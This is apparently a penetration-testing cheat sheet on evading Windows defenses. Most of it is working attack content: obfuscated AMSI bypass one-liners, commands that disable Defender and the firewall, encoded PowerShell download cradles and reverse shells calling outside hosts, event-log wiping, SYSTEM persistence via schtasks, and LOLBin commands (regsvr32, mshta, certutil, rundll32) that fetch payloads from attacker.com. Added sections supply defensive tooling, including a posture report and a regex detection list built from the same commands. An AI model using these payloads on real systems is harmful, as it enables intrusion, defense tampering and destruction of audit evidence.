
# Defense Enumeration

## LOLBAS

{% embed url="https://lolbas-project.github.io" %}

## AV Evasion

### Enumeration

```powershell
# Windows Defender status
PS C:\> Get-MpComputerStatus

# List registered AV products (SecurityCenter2 namespace; not present on Windows Server)
PS C:\> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object displayName, productState
C:\> wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState
```

### Disable Security Protections

```powershell
# Remove all definitions
PS C:\> cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

# Disable security protections
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

# Set AV exclusion rules
PS C:\> Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"
```

#### Bypass tools

* [DSViper](https://github.com/dagowda/DSViper) (Works! - 2025-05-01)
* [PowerJoker](https://github.com/Adkali/PowerJoker) (Works! - 2025-05-01)

#### Utilities

* [donut](https://github.com/TheWover/donut) (Generate Shellcodes)
* [InvisibilityCloak](https://github.com/h4wkst3r/InvisibilityCloak.git) (Obfuscation toolkit for C#)
* [DInvoke\_shellcodeload\_CSharp](https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp.git) (ShellCodeLoader via DInvoke)

#### Identify Bad flags (AV/AMSI)

* [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck.git)
* [DefenderCheck](https://github.com/matterpreter/DefenderCheck)

**Note:** Defender must be enabled on your system, but the real time protection and automatic sample submission features should be disabled.

### Techniques

[Bypass AV/EDR via DInvoke + Sliver](/intrusionz3r0/windows-penetration-testing/defense-enumeration/bypass-av-edr-via-dinvoke-+-sliver.md)

## AMSI

### Enumeration

{% hint style="danger" %}
This script contains malicious content and has been blocked by your antivirus software.
{% endhint %}

```powershell
#CMD (Windows Defender UID: 2781761E-28E2-4109-99FE-B9D127C57AFE)
C:\Windows\System32> reg query "HKLM\SOFTWARE\Microsoft\AMSI"

#Enumeration option Powershell
PS C:\> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\AMSI\'
PS C:\> $amsiContext = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if ($amsiContext) { "AMSI is enabled." } else { "AMSI is disabled." }
```

### How to Bypass AMSI

amsi.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process:

{% embed url="https://amsi.fail/" %}

**AMSI Bypass:**

```powershell
#Windows 10/11
PS C:\> class TrollAMSI{static [int] M([string]$c, [string]$s){return 1}}[System.Runtime.InteropServices.Marshal]::Copy(@([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]([TrollAMSI].GetMethods() | Where-Object Name -eq 'M').MethodHandle.Value + [long]8)),0, [long]([Ref].Assembly.GetType('System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls').GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq ScanContent).MethodHandle.Value + [long]8,1)

#Windows 10
PS C:\> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
PS C:\> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
PS C:\> (([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)
```

### Bypass reverse shell

Obfuscate the script by modifying the function names, removing the comments and deleting the examples section (`<# Remove Everything here #>`).

```powershell
#Encode payload on Linux
echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo

#Encode payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

#Execute the payload
PS C:\> powershell.exe powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=
PS C:\> powershell.exe -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=
```

## Firewall

### Enumeration

```powershell
# Check firewall status
netsh advfirewall show allprofiles
Get-NetFirewallProfile | Select-Object Name, Enabled

# List firewall rules
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' } | Select-Object DisplayName, Direction, Action
netsh advfirewall firewall show rule name=all
```

### Disable Firewall

```powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
```

### Manage firewall rules

```powershell
# Open a port (inbound and outbound)
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow range ports" protocol=TCP dir=in localport=8000-9000 action=allow
```

## EDR

### **AV Process List**

| **Security Product**      | **Process Names**                           | **Notes**       |
| ------------------------- | ------------------------------------------- | --------------- |
| **Microsoft Defender**    | `MsMpEng.exe`, `MSASCui.exe`                | Built-in AV/EDR |
| **CrowdStrike Falcon**    | `csagent.exe`, `CSFalconService.exe`        | Enterprise EDR  |
| **Elastic Endpoint**      | `elastic-agent.exe`, `elastic-endpoint.exe` | Open-source EDR |
| **Carbon Black (VMware)** | `cb.exe`, `CbDefense.exe`                   | Behavioral EDR  |
| **SentinelOne**           | `SentinelAgent.exe`                         | Next-gen AV/EDR |
| **CylancePROTECT**        | `CylanceSvc.exe`                            | AI-based AV     |
| **Symantec (Broadcom)**   | `ccSvcHst.exe`, `Rtvscan.exe`               | Legacy AV       |
| **Trend Micro**           | `TmCCSF.exe`                                | Enterprise AV   |
| **Kaspersky**             | `avp.exe`                                   | Common in SMEs  |

### Enumeration

```powershell
Get-Process | Where-Object { 
    $_.ProcessName -match "MsMpEng|csagent|elastic|cb\.exe|Sentinel|Cylance|ccSvcHst|TmCCSF|avp|wazuh|osqueryd|sysmon" 
} | Select-Object Name, Id, Path
```

## Constrained Language Mode

{% embed url="https://github.com/padovah4ck/PSByPassCLM" %}

```powershell
# Allow script execution for this process only
Set-ExecutionPolicy Bypass -Scope Process

# Get the current LanguageMode (ConstrainedLanguage vs FullLanguage)
$ExecutionContext.SessionState.LanguageMode

# Bypass via PSByPassCLM
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\Users\amanda\Documents\PsBypassCLM.exe

# Bypass by using PowerShell version 2
powershell -version 2
```

## Applocker

### Enumeration

```powershell
Get-AppLockerPolicy -Effective -XML | Out-File "C:\Temp\AppLockerPolicy.xml"
```

**CollectionType**

* `Exe` → Executables `.exe`
* `Script` → scripts `.ps1`, `.bat`, `.vbs`, etc.
* `Dll` → Libraries `.dll`
* `Msi` → Installers
* `Appx` → Modern apps (UWP)

**EnforcementMode**

* `NotConfigured` → Not applied (no restriction for that collection).
* `AuditOnly` → Logs events, but does not block.
* `Enabled` → AppLocker blocks what is not allowed.

> ✅ If you see AuditOnly, you are free to run without restrictions.
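The XML produced by `Get-AppLockerPolicy -Effective -XML` is what the `CollectionType` / `EnforcementMode` lists above describe. The following is an added example, not code from the original page: it parses that XML and reports, per rule collection, whether anything is actually blocked. The policy string is constructed for the demo (placeholder rule IDs); on a real host pass `(Get-AppLockerPolicy -Effective -XML)` instead.

```powershell
# Added example (not from the original page): report EnforcementMode per AppLocker
# rule collection from the policy XML. $SamplePolicyXml is constructed for the demo.

$SamplePolicyXml = @'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="All files in Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="All files in the Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000003" Name="Administrators run anything" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="AuditOnly">
    <FilePathRule Id="00000000-0000-0000-0000-000000000004" Name="Scripts in Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Msi" EnforcementMode="NotConfigured" />
</AppLockerPolicy>
'@

function Get-AppLockerEnforcementReport {
    param([Parameter(Mandatory)][string]$PolicyXml)

    [xml]$doc = $PolicyXml
    $byType = @{}
    foreach ($rc in $doc.AppLockerPolicy.RuleCollection) { $byType[$rc.Type] = $rc }

    # Every collection AppLocker knows about; one missing from the XML behaves like NotConfigured.
    foreach ($type in 'Exe', 'Script', 'Dll', 'Msi', 'Appx') {
        $rc    = $byType[$type]
        $mode  = if ($rc) { $rc.EnforcementMode } else { 'NotConfigured' }
        $rules = if ($rc) { @($rc.ChildNodes | Where-Object NodeType -eq 'Element') } else { @() }

        # The stock "Everyone may run %WINDIR%\*" allow rule is what makes the user-writable
        # folders under C:\Windows (listed later on this page) interesting: a file dropped
        # there is allowed unless a Deny rule says otherwise.
        $windirAllow = @($rules | Where-Object {
            $_.Action -eq 'Allow' -and $_.UserOrGroupSid -eq 'S-1-1-0' -and
            $_.Conditions.FilePathCondition.Path -eq '%WINDIR%\*'
        }).Count -gt 0

        if ($mode -eq 'Enabled') {
            $finding = if ($windirAllow) { 'Enforced, but Everyone may run from %WINDIR%\* (review writable subfolders)' } else { 'Enforced' }
        } elseif ($mode -eq 'AuditOnly') {
            $finding = 'Logs only (AppLocker events 8003/8006), nothing is blocked'
        } else {
            $finding = 'Not configured: this file type is unrestricted'
        }

        [pscustomobject]@{
            Collection = $type
            Mode       = $mode
            Rules      = $rules.Count
            Allow      = @($rules | Where-Object Action -eq 'Allow').Count
            Deny       = @($rules | Where-Object Action -eq 'Deny').Count
            Finding    = $finding
        }
    }
}

Get-AppLockerEnforcementReport -PolicyXml $SamplePolicyXml | Format-Table -AutoSize
```

With the sample policy the report shows `Exe` enforced but with the broad `%WINDIR%\*` allow rule, `Script` in audit mode, and `Dll`, `Msi` and `Appx` unrestricted, which is exactly the combination the quote above is pointing at.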

## Device Guard

### Enumeration

```powershell
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
```

* `RequiredSecurityProperties`: `2` (Enabled).
* `VirtualizationBasedSecurityStatus`: `1` (Enabled).

## LSA Protection

### Enumeration

```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
(Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA").RunAsPPL
```

* **`0` = Disabled** (vulnerable to mimikatz).
* **`1` = Enabled** (protects `lsass.exe`).

## User Account Control (UAC)

### Enumeration

```powershell
# Check if UAC is enabled (1 = Enabled, 0 = Disabled)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

# Get UAC prompt behavior (0-5 values)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
```

#### **UAC Values**

| **Registry Key**               | **Value**     | **Effect**                               | **Pentester Impact**                  |
| ------------------------------ | ------------- | ---------------------------------------- | ------------------------------------- |
| **EnableLUA**                  | `1`           | UAC ON (default)                         | Blocks silent privilege escalation.   |
| **EnableLUA**                  | `0`           | UAC OFF (dangerous)                      | **Easy admin access** (no prompts).   |
| **ConsentPromptBehaviorAdmin** | `0`           | No prompt (auto-elevate if admin).       | **Best for attackers** (no warnings). |
| **ConsentPromptBehaviorAdmin** | `1`           | Prompt for credentials (secure desktop). | Needs creds/phishing.                 |
| **ConsentPromptBehaviorAdmin** | `2` (Default) | Prompt for confirmation.                 | User interaction needed.              |
| **ConsentPromptBehaviorAdmin** | `5`           | Prompt only for non-Windows binaries.    | Bypassable with LOLBins.              |
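The Defender, AMSI, firewall, Device Guard, LSA Protection and UAC checks above are each a one-liner; what a reviewer usually wants is all of them in one table with a verdict per control. The following is an added example, not code from the original page. It assumes an elevated PowerShell session on a Windows host (the Defender and NetSecurity modules ship with Windows); every probe is isolated so a missing module or access-denied produces a row marked `Unknown` instead of aborting, and it only reads state. The `Add-Row` helper and the OK/WEAK thresholds are this example's own choices, taken from the value tables on this page.

```powershell
# Added example (not from the original page): single-pass report over the defensive
# controls this page enumerates. Read-only; run elevated on a Windows host.

function Test-DefensePosture {
    $rows = New-Object System.Collections.Generic.List[object]
    function Add-Row([string]$Control, $Value, [bool]$Ok, [string]$Note) {
        $rows.Add([pscustomobject]@{
            Control = $Control; Value = $Value
            Status  = $(if ($Ok) { 'OK' } else { 'WEAK' }); Note = $Note })
    }

    # 1. Defender engine state and exclusions (Get-MpComputerStatus / Get-MpPreference)
    try {
        $mp   = Get-MpComputerStatus -ErrorAction Stop
        $pref = Get-MpPreference -ErrorAction Stop
        Add-Row 'Defender.RealTimeProtection' $mp.RealTimeProtectionEnabled $mp.RealTimeProtectionEnabled 'Set-MpPreference -DisableRealtimeMonitoring turns this off'
        Add-Row 'Defender.BehaviorMonitoring' $mp.BehaviorMonitorEnabled   $mp.BehaviorMonitorEnabled   ''
        Add-Row 'Defender.IOAVProtection'     $mp.IoavProtectionEnabled    $mp.IoavProtectionEnabled    'Scans downloaded files and attachments'
        $ex = @(@($pref.ExclusionPath) + @($pref.ExclusionProcess) + @($pref.ExclusionExtension) | Where-Object { $_ })
        Add-Row 'Defender.Exclusions' $(if ($ex) { $ex -join '; ' } else { 'none' }) ($ex.Count -eq 0) 'Every exclusion is a scan blind spot; justify each one'
    } catch { Add-Row 'Defender' 'Unknown' $false "Query failed: $($_.Exception.Message)" }

    # 2. AMSI providers are registered under HKLM\SOFTWARE\Microsoft\AMSI\Providers;
    #    Defender's is the CLSID quoted in the AMSI section of this page.
    $providers = @(Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue)
    Add-Row 'AMSI.Providers' $providers.Count ($providers.Count -gt 0) 'No provider registered means nothing scans script content'

    # 3. Firewall profiles (Get-NetFirewallProfile)
    try {
        foreach ($p in Get-NetFirewallProfile -ErrorAction Stop) {
            Add-Row "Firewall.$($p.Name)" $p.Enabled ($p.Enabled -eq 'True') 'Disabled via Set-NetFirewallProfile or netsh advfirewall set ... state off'
        }
    } catch { Add-Row 'Firewall' 'Unknown' $false "Query failed: $($_.Exception.Message)" }

    # 4. LSA Protection: RunAsPPL absent or 0 leaves lsass.exe unprotected
    $ppl = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA' -ErrorAction SilentlyContinue).RunAsPPL
    Add-Row 'LSA.RunAsPPL' $(if ($null -eq $ppl) { 'not set' } else { $ppl }) ($ppl -ge 1) '0 or missing: credential dumping from lsass is possible'

    # 5. UAC: EnableLUA must be 1; ConsentPromptBehaviorAdmin 0 or 5 weakens elevation (see table above)
    $sys  = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -ErrorAction SilentlyContinue
    $cpba = $sys.ConsentPromptBehaviorAdmin
    Add-Row 'UAC.EnableLUA' $sys.EnableLUA ($sys.EnableLUA -eq 1) '0 disables UAC entirely'
    Add-Row 'UAC.ConsentPromptBehaviorAdmin' $cpba ($cpba -in 1, 2) '0 = silent auto-elevate; 5 = prompts only for non-Windows binaries'

    # 6. Device Guard / VBS (Win32_DeviceGuard); 0 = off, 2 = running
    $dg = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
    Add-Row 'DeviceGuard.VBSStatus' $dg.VirtualizationBasedSecurityStatus ($dg.VirtualizationBasedSecurityStatus -ge 1) 'VBS off: no credential guard / HVCI'

    $rows
}

Test-DefensePosture | Format-Table -AutoSize
```

The report is deliberately flat (one row per control) so it can be exported with `Export-Csv` and diffed between hosts or across time; a control flipping from `OK` to `WEAK` is the first thing to investigate after a suspected compromise.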

## Event Log Cleansing

```powershell
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
```

## Writeable paths for non-admins

```
C:\Windows\Tasks 
C:\Windows\Temp 
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```

## LOLBAS Useful Commands to Bypass Security Solutions

#### `regsvr32.exe` – Remote Code Execution (No Disk Write)

**Bypasses AMSI, AV, AppLocker**

```bash
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
```

* Executes remote scriptlet files (.sct) from memory.
* No file touches disk.
* Evades logging and bypasses AV heuristics.

***

#### `mshta.exe` – HTML Application Loader

**Bypasses AppLocker and basic AV**

```bash
mshta http://attacker.com/payload.hta
```

Or run inline script:

```bash
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -enc <BASE64>""")
```

***

#### `powershell.exe` with Base64 Payload

**Bypasses basic AV and logs**

```bash
powershell -nop -w hidden -enc <Base64-Encoded Payload>
```

* Use with encoded payloads to evade string-based detection.
* Add `-version 2` to bypass AMSI and Constrained Language Mode (on older systems).

***

#### `rundll32.exe` – DLL Execution or COM Exploit

**AppLocker bypass, script execution**

```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/shell.sct");
```

Or execute exported function from a malicious DLL:

```bash
rundll32.exe payload.dll,ExportedFunction
```

***

#### `InstallUtil.exe` – .NET Binary Execution

**Bypasses CLM, AppLocker**

```bash
InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe
```

* `payload.exe` must override the `Uninstall()` method.
* Lives under the .NET Framework directories (the full path is shown in the Constrained Language Mode section).

***

#### `certutil.exe` – Download and Decode Payloads

**Network evasion, no PowerShell**

```bash
# Download file from remote server
certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe

# Decode a base64 payload
certutil -decode payload.b64 payload.exe
```

***

#### `forfiles.exe` – Execute Command as File Handler

**UAC bypass and execution**

```bash
forfiles /p C:\ /m notepad.exe /c "cmd /c calc.exe"
```

***

#### `wmic.exe` – Execute Commands Without PowerShell or CMD

```bash
wmic process call create "cmd.exe /c calc.exe"
```

* Executes commands without PowerShell, can evade detection.

***

#### `schtasks.exe` – Schedule Execution (Persistence + Evasion)

```bash
schtasks /create /tn "Updater" /tr "powershell.exe -enc <payload>" /sc onlogon /ru SYSTEM
```

* Often whitelisted.
* Useful for persistent or delayed payloads.

***

#### `scriptrunner.exe` – Executes Scripts via Signed Binary (SCCM)

```bash
scriptrunner.exe -appvscript payload.bat
```

* Executes scripts using a trusted Microsoft-signed binary.

***

#### `msbuild.exe` – Inline C# Payload Execution

```xml
<!-- Save as payload.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe");
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
```

Then run:

```bash
msbuild.exe payload.xml
```
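Each LOLBin above is a signed Microsoft binary, so the detection signal is not the image name but the command line it was started with (the `CommandLine` field of Sysmon Event ID 1 or Security Event ID 4688). The following is an added example, not code from the original page: a small signature set built only from the command shapes shown in this section (plus the `wevtutil cl` and `Set-MpPreference` / `Add-MpPreference` commands from earlier sections), run over constructed sample command lines. The regexes, the benign control lines and the ATT&CK technique mappings are this example's own.

```powershell
# Added example (not from the original page): flag LOLBin command lines from this
# page in process-creation telemetry. $SampleCommandLines is constructed for the demo.

$Rules = @(
    @{ Name = 'regsvr32 remote scriptlet';     Technique = 'T1218.010'; Pattern = 'regsvr32(\.exe)?\s.*(/i:\S*https?:|scrobj\.dll)' }
    @{ Name = 'mshta URL or inline script';    Technique = 'T1218.005'; Pattern = 'mshta(\.exe)?\s+(https?:|vbscript:|javascript:)' }
    @{ Name = 'powershell encoded / v2';       Technique = 'T1059.001'; Pattern = 'powershell(\.exe)?\s.*(\s-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}|\s-version\s+2\b)' }
    @{ Name = 'rundll32 script protocol';      Technique = 'T1218.011'; Pattern = 'rundll32(\.exe)?\s+(javascript:|vbscript:|.*mshtml,RunHTMLApplication)' }
    @{ Name = 'InstallUtil uninstall trick';   Technique = 'T1218.004'; Pattern = 'installutil(\.exe)?\s.*/logfile=\s.*/u\s' }
    @{ Name = 'certutil download / decode';    Technique = 'T1140';     Pattern = 'certutil(\.exe)?\s.*(-urlcache|-decode)\b' }
    @{ Name = 'forfiles command proxy';        Technique = 'T1202';     Pattern = 'forfiles(\.exe)?\s.*/c\s+"?cmd' }
    @{ Name = 'wmic process create';           Technique = 'T1047';     Pattern = 'wmic(\.exe)?\s.*process\s+call\s+create' }
    @{ Name = 'schtasks SYSTEM + powershell';  Technique = 'T1053.005'; Pattern = 'schtasks(\.exe)?\s.*/create\s(?=.*/ru\s+system)(?=.*(powershell|-enc))' }
    @{ Name = 'msbuild inline-task project';   Technique = 'T1127.001'; Pattern = 'msbuild(\.exe)?\s+\S*\.xml\b' }
    @{ Name = 'event log cleared';             Technique = 'T1070.001'; Pattern = 'wevtutil(\.exe)?\s+cl\s' }
    @{ Name = 'Defender tampering';            Technique = 'T1562.001'; Pattern = '(Set-MpPreference\s.*-Disable|Add-MpPreference\s.*-Exclusion|MpCmdRun(\.exe)?\s.*-removedefinitions)' }
)

# Constructed sample telemetry: the first seven lines mirror commands from this page,
# the last three are benign admin activity that must not fire.
$SampleCommandLines = @(
    'regsvr32 /s /n /u /i:http://attacker.example/payload.sct scrobj.dll'
    'mshta http://attacker.example/payload.hta'
    'powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQA'
    'certutil -urlcache -split -f http://attacker.example/malware.exe evil.exe'
    'schtasks /create /tn "Updater" /tr "powershell.exe -enc AAAA" /sc onlogon /ru SYSTEM'
    'wevtutil cl Security'
    'powershell Set-MpPreference -DisableRealtimeMonitoring $true'
    'regsvr32 /s C:\Windows\System32\msxml6.dll'
    'certutil -hashfile C:\Temp\installer.msi SHA256'
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'
)

function Find-SuspiciousCommandLine {
    param(
        [Parameter(Mandatory)][string[]]$CommandLine,
        [hashtable[]]$Rule = $Rules
    )
    foreach ($line in $CommandLine) {
        foreach ($r in $Rule) {
            # -match is case-insensitive by default, which suits mixed-case binaries and switches
            if ($line -match $r.Pattern) {
                [pscustomobject]@{ Rule = $r.Name; Technique = $r.Technique; CommandLine = $line }
            }
        }
    }
}

Find-SuspiciousCommandLine -CommandLine $SampleCommandLines | Format-Table -AutoSize
```

On the sample input the seven attack-shaped lines each produce one hit and the three benign lines produce none. Treat `certutil -urlcache` and `schtasks /create` hits as triage items rather than auto-block rules, since administrators use both legitimately; the `wevtutil cl` rule is a backstop, because clearing the Security log also writes Event ID 1102 (and clearing System writes Event ID 104), which survive in forwarded logs even when the local log is gone.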

